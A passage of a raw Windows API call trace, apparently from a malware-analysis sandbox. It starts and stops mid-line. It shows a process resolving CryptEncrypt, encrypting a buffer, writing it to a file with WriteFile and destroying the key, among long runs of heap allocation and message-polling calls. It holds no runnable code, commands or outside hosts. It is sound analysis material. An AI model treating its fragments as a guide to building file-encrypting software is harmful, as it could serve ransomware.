dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0216.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50c08 [0216.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50c08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0216.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0216.546] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0216.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0216.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0216.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54558 [0216.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0216.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0216.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0216.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0216.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0216.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0216.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0216.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0216.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0216.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0216.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0216.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0216.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0216.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0216.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0216.546] CryptEncrypt (in: hKey=0xa87650, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f3c228*, pdwDataLen=0x8cef60*=0x80a1, dwBufLen=0x80a8 | out: pbData=0x2f3c228*, pdwDataLen=0x8cef60*=0x80a8) returned 1 [0216.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0216.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0216.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0216.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0216.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0216.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0216.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0216.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0216.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0216.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0216.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0216.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0216.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0216.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0216.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0216.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0216.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0216.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0216.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0216.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0216.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0216.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0216.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0216.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0216.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0216.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0216.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0216.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0216.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0216.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0216.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0216.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0216.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0216.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0216.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0216.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0216.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0216.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0216.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0216.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0216.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0216.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0216.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0216.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0216.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0216.591] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.591] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.591] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.591] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.591] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.591] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.591] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.592] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0216.592] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0216.592] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0216.592] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0216.592] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0216.592] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0216.593] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0216.593] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0216.593] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0216.593] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0216.593] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.598] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.598] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.598] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.599] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f24018*, nNumberOfBytesToWrite=0x80a8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f24018*, lpNumberOfBytesWritten=0x8cf5e4*=0x80a8, lpOverlapped=0x0) returned 1 [0216.603] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.603] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.603] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0216.603] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0216.603] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0216.603] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0216.603] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0216.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0216.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e508c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0216.604] CryptDestroyKey (hKey=0xa87650) returned 1 [0216.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0216.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0216.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0216.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0216.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0216.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0216.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0216.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0216.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0216.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0216.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0216.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0216.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0216.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0216.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0216.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0216.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0216.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0216.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0216.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0216.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0216.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0216.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0216.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0216.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0216.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0216.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0216.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0216.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0216.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0216.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0216.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0216.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0216.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0216.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0216.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0216.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0216.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0216.605] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0216.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0216.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0216.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0216.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0216.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0216.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0216.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0216.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0216.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0216.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0216.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0216.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0216.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0216.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0216.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0216.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0216.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0216.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0216.606] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0216.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0216.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0216.606] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0216.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0216.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0216.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0216.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0216.606] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0216.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0216.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0216.606] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0216.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0216.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0216.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0216.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0216.606] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0216.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0216.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0216.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0216.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0216.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0216.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0216.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0216.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0216.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0216.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0216.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0216.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0216.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0216.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0216.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0216.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0216.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0216.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0216.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0216.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0216.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0216.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0216.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0216.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0216.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0216.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0216.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0216.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0216.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0216.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0216.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0216.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0216.608] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0216.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0216.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0216.608] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0216.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0216.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0216.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0216.608] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0216.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0216.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0216.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0216.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0216.608] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, 